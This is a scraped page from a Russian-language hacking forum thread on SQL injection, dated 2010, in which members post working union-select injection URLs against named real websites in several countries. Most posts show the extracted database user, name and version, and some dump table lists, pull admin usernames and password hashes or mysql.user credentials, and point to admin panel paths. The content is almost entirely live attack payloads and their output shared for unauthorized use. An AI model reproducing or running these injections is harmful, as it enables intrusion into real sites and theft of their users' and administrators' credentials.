SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://profremont.com.ua/advices.php?article=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3--
    Username: profremon_base@192.168.2.4
    Database: profremon_base
    Version: 5.0.51a-log

    Code:
    http://www.vanillamusic.gr/index.php?module=content&action=article&id=-1+union+select+user(),2--
    Username: vmusic@localhost
    Database: vanillamusic_gr
    Version: 4.0.26

    Вывод в заголовке.

    Code:
    http://www.savatouristik.ru/index.php?mid_open=7&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
    Username: client304@localhost
    Database: savatour
    Version: 4.0.27

    Code:
    http://www.downhill911.com/actualite-vtt-express.php?n=824+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9--
    Username: Root@localhost
    Database: lmorillon
    Version: 4.0.12-max-debug
     
    #11541 root_sashok, 22 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  2. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    56
    Likes Received:
    53
    Reputations:
    18
    PR: 5

    5.0.81-log

    dbo234342530@74.208.16.153


    Code:
    http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,group_concat%28username%29,3,group_concat%28password%29+from+admin%20--
    админкЭ

    http://www.downtowncrossing.org/admin
     
  3. _eXorcist_

    _eXorcist_ Member

    Joined:
    24 Dec 2009
    Messages:
    100
    Likes Received:
    5
    Reputations:
    0
    Host Information

    Server = Apache
    Version = 5.0.70-debug-log
    Powered by = PHP/5.2.12-pl0-gentoo
    Attack Type = SQL Union Injection
    Current User = h_bolt_ru@localhost
    Current Database = bolt_ru
    Supports Union = yes
    Union Columns = 17

    Url| http://www.bolt.ru/cl2.php?metcod=1034

    Vuln: http://www.bolt.ru/cl2.php?metcod=1034+and+1=0+ Union Select 1 ,2,3,4,5,6,7,8, UNHEX(HEX([visible])) ,10,11,12,13,14,15,16,17

    Comment: --

    Visible Column: 9

    Hexed: True

    Cookie:

    Keyword:

    Param:

    Database:bolt_ru

    information_schema
    bolt_ru

    Tables:
    555 L
    555 E
    DIN 125 A
    DIN 125 A2
    DIN 1480
    DIN 1481
    DIN 1587 A2
    DIN 2093
    DIN 316
    DIN 426 A
    DIN 439 A2
    DIN 444
    DIN 471 (ГОСТ 13942-86)
    DIN 471 (нормальный тип)
    DIN 471 (тЯжелый тип)
    DIN 472 (нормальный тип)
    DIN 472 (тЯжелый тип)
    DIN 472 ГОСТ 13943
    DIN 530 A
    DIN 538 A
    DIN 555 A
    DIN 555 C
    DIN 556 A
    DIN 562
    DIN 564 A
    DIN 567A
    DIN 571
    DIN 571A
    DIN 580 A2
    DIN 582
    DIN 603
    DIN 616A
    DIN 622A
    DIN 6331
    DIN 6334
    DIN 6797
    DIN 6798
    DIN 6799
    DIN 6915
    DIN 6916
    DIN 6923
    DIN 7500 M (ГОСТ 11650)
    DIN 7976
    DIN 7980 A2
    DIN 7981 Z A2
    DIN 7981
    DIN 7982 Z A2
    DIN 7982
    DIN 7985 Z A2
    DIN 7985
    DIN 9021 A2
    DIN 9021
    DIN 912 A2
    DIN 912
    DIN 913
    DIN 914 A2
    DIN 914
    DIN 915 A2
    DIN 915
    DIN 916 A2
    DIN 916
    DIN 931
    DIN 933 A2
    DIN 933
    DIN 934 A2
    DIN 934
    DIN 937
    DIN 94
    DIN 95
    DIN 963 A2
    DIN 963
    DIN 964
    DIN 965 Z A2
    DIN 965
    DIN 966
    DIN 967
    DIN 975 A2
    DIN 975
    DIN 976
    DIN 982
    DIN 985 A2
    DIN 985
    ISO 7380
    Pozi
    Tesr Din 2
    Test Din
    anons
    assortiment
    catpage
    grps
    massy
    met_sys_vars
    news
    phpbb_acl_groups
    phpbb_acl_options
    phpbb_acl_roles
    phpbb_acl_roles_data
    phpbb_acl_users
    phpbb_attachments
    phpbb_banlist
    phpbb_bbcodes
    phpbb_bookmarks
    phpbb_bots
    phpbb_config
    phpbb_confirm
    phpbb_disallow
    phpbb_drafts
    phpbb_extension_groups
    phpbb_extensions
    phpbb_forums
    phpbb_forums_access
    phpbb_forums_track
    phpbb_forums_watch
    phpbb_groups
    phpbb_icons
    phpbb_lang
    phpbb_log
    phpbb_moderator_cache
    phpbb_modules
    phpbb_poll_options
    phpbb_poll_votes
    phpbb_posts
    phpbb_privmsgs
    phpbb_privmsgs_folder
    phpbb_privmsgs_rules
    phpbb_privmsgs_to
    phpbb_profile_fields
    phpbb_profile_fields_data
    phpbb_profile_fields_lang
    phpbb_profile_lang
    phpbb_ranks
    phpbb_reports
    phpbb_reports_reasons
    phpbb_search_results
    phpbb_search_wordlist
    phpbb_search_wordmatch
    phpbb_sessions
    phpbb_sessions_keys
    phpbb_sitelist
    phpbb_smilies
    phpbb_styles
    phpbb_styles_imageset
    phpbb_styles_imageset_data
    phpbb_styles_template
    phpbb_styles_template_data
    phpbb_styles_theme
    phpbb_topics
    phpbb_topics_posted
    phpbb_topics_track
    phpbb_topics_watch
    phpbb_user_group
    phpbb_users
    phpbb_warnings
    phpbb_words
    phpbb_zebra
    pictbl
    prt
    prt2
    prt3
    tovkw
    tovkw2
    ВытЯжнаЯ в потай
    ВытЯжнаЯ с буртиком
    ГОСТ 10299-80
    ГОСТ 10300-80
    ГОСТ 10605-94
    ГОСТ 11371-78 исп 1 кл А
    ГОСТ 11371-78 исп 1 кл С
    ГОСТ 11371-78 исп 2
    ГОСТ 1144-80
    ГОСТ 1145-80
    ГОСТ 1146-80
    ГОСТ 11530-76
    ГОСТ 11532-76
    ГОСТ 11674-75
    ГОСТ 11738-84
    ГОСТ 11860-85 исп 1
    ГОСТ 11860-85 исп 2
    ГОСТ 1491-80
    ГОСТ 17473-80
    ГОСТ 17474-80
    ГОСТ 17475-80=DIN 7991
    ГОСТ 22042-76 исп 1
    ГОСТ 22353-77
    ГОСТ 22354-77
    ГОСТ 22355-77
    ГОСТ 3032-76
    ГОСТ 397-79
    ГОСТ 4028-63
    ГОСТ 4029-63
    ГОСТ 4751-73 (DIN 580)
    ГОСТ 5915-70
    ГОСТ 5918-73 исп 1
    ГОСТ 5918-73 исп 2
    ГОСТ 5929-70
    ГОСТ 6402-70 лег
    ГОСТ 6402-70 норм
    ГОСТ 6402-70 тжл
    ГОСТ 6958-78 кл А
    ГОСТ 6958-78 кл С
    ГОСТ 7786-81
    ГОСТ 7795-70
    ГОСТ 7796-70
    ГОСТ 7798-70
    ГОСТ 7801-81
    ГОСТ 7802-81
    ГОСТ 7805-70
    ГОСТ 7808-70
    ГОСТ 799-73
    ГОСТ 809-71
    ГОСТ 8144-73
    ГОСТ 9064-75
    Конфирмат
    Саморез по гипсокартону
    Саморез
    Шуруп потай, универсальный (пози)

    Columns: Table
     
    1 person likes this.
  4. kori256

    kori256 Member

    Joined:
    7 Feb 2009
    Messages:
    53
    Likes Received:
    33
    Reputations:
    6
    Code:
    http://www.globalideasbank.org/site/store/detail.php?articleId=43+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1,1--
    Username: gib_db@localhost
    Database: gib_db
    Version: 5.0.89-community
     
    2 people like this.
  5. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://zdrave.bg/popup.php?c=n&id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--
    Username: rossen_tiabg@localhost
    Database: rossen_zdrave
    Version: 5.0.86
     
  6. artel87

    artel87 New Member

    Joined:
    19 Jan 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    3
    Code:
    http://subaru-club.org/article.asp?ID=161+OR+161=(select%20db_name())&TopicArea=1&ParentID=1
    Database: subaru-club
    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
     
    2 people like this.
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Code:
    _http://www.jewstars.co.cc/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://ottava.info/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://rap-dvor.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    Code:
    _http://6mobil.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    /admin.php
     
    _________________________
    #11547 Strilo4ka, 23 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  8. KENTov

    KENTov New Member

    Joined:
    16 Dec 2009
    Messages:
    6
    Likes Received:
    4
    Reputations:
    1
    Code:
    http://www.michaelkenna.net/gallery.php?id=2
    Host IP: 69.89.18.101
    Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
    Powered-by: PHP/5.2.13
    DB Server: MySQL unknown ver
    Current DB: michafj0_mkenna

    :eek: ;) :p :)

    HTML:
    Target: 		http://www.fairfieldcountylook.com/gallery.php?id=161
    Host IP: 74.208.32.200
    Web Server: Apache
    Powered-by: PHP/4.4.9
    DB Server: MySQL >=5
    Current DB: db258333454
     
    #11548 KENTov, 23 Mar 2010
    Last edited: 23 Mar 2010
  9. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.itest.ru/samoactual.php?qnum=-1+union+select+user(),version(),database()--
    Username: sociolove@localhost
    Database: sociolove
    Version: 5.0.26-log

    Таблицы не выводит, стоит какая-то защита.

    KENTov, в теме нельзя выкладывать инъекции вида "site.ru/index.php?id=1", найди хотя бы количество колонок.

    Пример SQL:

    Code:
    http://www.michaelkenna.net/gallery.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
     
    #11549 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  10. KENTov

    KENTov New Member

    Joined:
    16 Dec 2009
    Messages:
    6
    Likes Received:
    4
    Reputations:
    1
    PHP:
    Target:         http://www.snis.ch/news.php?ID=15
    Host IP: 84.16.92.9
    Web Server: Apache
    DB Server: MySQL >=5
    Current DB: swissinternationalstudiesch
     
    1 person likes this.
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    hn_sql@ouagadougou.dreamhost.com:hn_stream:5.0.89-userstats-log
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    PHP:
    _http://www.luxury-auction.org.ua/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
    /admin.php
     
    _________________________
    #11552 Strilo4ka, 23 Mar 2010
    Last edited: 23 Mar 2010
  13. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Code:
    http://www.diplom-service.ru/ds.php?id=-1+union+Select+version()--
    Code:
    http://www.haradagr-dp.co.jp/ds.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
    Code:
    http://www.bsp-abogados.com/noticias/index-de.php?id=-1+union+select+version()--
    Code:
    http://www.visionodontologia.com.br/dr.php?id=1&pagina=1%27+union+select+1,2,3,passwd,5,6,7,8,9+from+users/*
    Code:
    http://rolandos-cars-corfu.com/room-order-du.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11+users--

    Code:
    http://www.propuestasturismo.com.ar/dd.php?id=-4+union+select+1,2,3,4,5,6,7,version()--
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://www.arts-et-metiers.net/musee.php?P=214&id=278+and+1=0+union+select+1,2,3,4,concat(user,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--

    user() : webuser@localhost

    version() : 5.0.44-log

    database() : cnam2007
     
    _________________________
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    cookie
    Microsoft Jet DB
     
    1 person likes this.
  16. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Админко /admin.php
     
    _________________________
  17. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Шоп + админка ничего интересного

    админка /admin

    HTML:
    http://www.offroadbikepartsonline.com.au/detail.php?prod_id=-32%27+union+select+1,2,3,4,5,6,7,8,9,group_concat(version(),0x3a,user(),0x3a,database()+separator+0x0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cat_id=15
     
    1 person likes this.
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    Version: 5.0.45-log
    User: andy@localhost
    dbname: studentfund
     
    1 person likes this.
  19. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    402
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.lyricsprovider.com/song.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7--
    Username: lyricsprovider@localhost
    Database: lyricsprovider
    Version: 5.0.45

    Таблицы:

    Code:
    ads_admin_session
    ads_adposition
    ads_banner
    ads_banzone
    ads_stats
    ads_user
    ads_zone
    album_lyrics
    albums
    artist_links
    artists
    counter
    flash_access
    flash_poll
    guest_lyrics
    guests
    lyric_details
    lyric_discus
    lyric_quality_rate
    lyric_send
    lyric_urls
    lyrics
    mb_replies
    partners
    stats
    stats_reset
    titles
    top20usa
    top40
    updates
     
    #11559 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Code:
    http://content.tcc.fl.edu/contacts/show.asp?type=area&id=19+or+1=%28select+top+1+table_name+from+information_schema.tables%29+--+
    Моя первая mssql :)
     
Loading...
Thread Status:
Not open for further replies.